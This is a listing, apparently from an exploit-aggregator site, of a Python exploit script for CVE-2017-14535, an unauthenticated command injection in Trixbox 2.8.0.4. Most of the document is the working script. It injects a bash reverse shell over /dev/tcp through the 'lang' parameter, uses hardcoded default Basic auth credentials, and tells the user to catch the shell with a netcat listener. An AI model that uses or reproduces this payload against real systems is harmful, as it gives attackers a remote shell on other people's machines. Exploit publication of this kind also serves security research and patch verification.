Exploit for Trixbox 2.8.0.4 Remote Code Execution CVE-2017-14535

Name: Exploit for Trixbox 2.8.0.4 Remote Code Execution CVE-2017-14535
Rating: 5 (126 reviews)
2021-05-28 | CVSS 9.0
## https://sploitus.com/exploit?id=PACKETSTORM:162854
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)  
# Date: 27.05.2021  
# Exploit Author: Ron Jost (Hacker5preme)  
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/  
# Credits to: Sachin Wagh  
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/  
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download  
# Version: 2.8.0.4  
# Tested on: Xubuntu 20.04  
# CVE: CVE-2017-14535  
  
'''  
Description:  
trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php  
'''  
  
  
  
'''  
Import required modules:  
'''  
import requests  
import sys  
import time  
  
  
'''  
User-input:  
'''  
target_ip = sys.argv[1]  
target_port = sys.argv[2]  
listen_ip = sys.argv[3]  
listen_port = sys.argv[4]  
  
  
'''  
Construct malicious request:  
'''  
# Construct header:  
header = {  
'Host': target_ip,  
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1',  
'Cache-Control': 'max-age=0'  
}  
  
# Construct malicious link:  
link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'  
link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'  
link = link_p1 + link_p2  
  
  
'''  
Finish: EXPLOIT!!!  
'''  
print('')  
print('')  
print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port)  
print('')  
time.sleep(2)  
Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")  
if Ready == 'EXPLOIT':  
print('')  
print('Exploit sent, check your Netcat instance :)')  
x = requests.post(link, headers=header)  
else:  
print('TRY AGAIN')